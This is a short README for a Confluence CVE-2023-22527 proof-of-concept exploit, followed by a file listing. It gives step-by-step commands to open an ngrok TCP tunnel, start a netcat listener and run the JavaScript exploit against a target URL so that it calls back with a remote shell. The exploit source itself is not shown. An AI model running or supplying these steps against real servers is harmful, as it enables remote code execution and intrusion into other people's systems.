[Confluence] CVE-2023-22527 realworld poc# CVE-2023-22527-confluence
[Confluence] CVE-2023-22527 realworld poc
# Usage
## Download bun
https://github.com/oven-sh/bun/releases
## Start ngrok
```
ngrok tcp 4444
```
## Listen localhost 4444
```
nc -nvlp 4444
```
## Run exploit
```
bun exploit-CVE-2023-22527.js --lhost 0.tcp.ap.ngrok.io --lport 12169 --target https://xxx/
```
## Result


[4.0K] /data/pocs/4fd9659479f59a70dbcd2b1d3cbd7e03dfd04075
├── [3.6K] exploit-CVE-2023-22527.js
└── [ 583] README.md
0 directories, 2 files